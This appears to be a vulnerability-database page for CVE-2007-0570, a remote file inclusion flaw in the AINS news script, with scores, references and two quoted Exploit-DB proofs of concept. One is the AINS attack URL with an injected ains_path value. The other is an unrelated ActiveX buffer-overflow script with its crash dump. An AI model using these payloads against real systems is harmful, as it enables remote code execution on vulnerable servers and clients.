CVE-2007-0570
published 2007-01-30CVE-2007-0570: PHP remote file inclusion vulnerability in ains_main.php in Johannes Gijsbers (aka Taradino) Ad Fundum Integratable News Script (AINS) 0.02b allows remote…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.67%
83.9th percentile
PHP remote file inclusion vulnerability in ains_main.php in Johannes Gijsbers (aka Taradino) Ad Fundum Integratable News Script (AINS) 0.02b allows remote attackers to execute arbitrary PHP code via a URL in the ains_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| johannes_gijsbers | ad_fundum_integratable_news_script | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
exploitdb·2007-05-14
CVE-2007-2648 Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
---
2007/05/14
Clever Database Comparer ActiveX version 2.2 Remote Buffer Overflow Exploit
url: http://www.clevercomponents.com/home/news.asp
price: from $49.99 to $149.19
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
Sub tryMe
buff = String(2000,"A")
test.ConnectToDatabase buff,"default", "default", "default", "default"
End Sub
faultmon dump:
12:58:35.492 pid=0570 tid=07FC EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
EAX=01D04141: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=41418282: ?? ??
Exploit-DB
AINS 0.02b - 'ains_main.php?ains_path' Remote File Inclusion
exploitdb·2007-01-26
CVE-2007-0570 AINS 0.02b - 'ains_main.php?ains_path' Remote File Inclusion
AINS 0.02b - 'ains_main.php?ains_path' Remote File Inclusion
---
AINS 0.02b - Remote File Include Vulnerabilities
Download:http://puzzle.dl.sourceforge.net/sourceforge/wassup/AINS002beta.zip
Finded by ThE dE@Th
Greetings For :AsB-May Team & HaCk.eGy
ains_main.php:
include("$ains_path/ains_global.inc");
http://www.site.com/[path]/ains_main.php?ains_path=[evil_code]
# milw0rm.com [2007-01-26]
No writeups or analysis indexed.
http://osvdb.org/36620http://www.securityfocus.com/bid/22259http://www.vupen.com/english/advisories/2007/0384https://exchange.xforce.ibmcloud.com/vulnerabilities/31850https://www.exploit-db.com/exploits/3202http://osvdb.org/36620http://www.securityfocus.com/bid/22259http://www.vupen.com/english/advisories/2007/0384https://exchange.xforce.ibmcloud.com/vulnerabilities/31850https://www.exploit-db.com/exploits/3202
2007-01-30
Published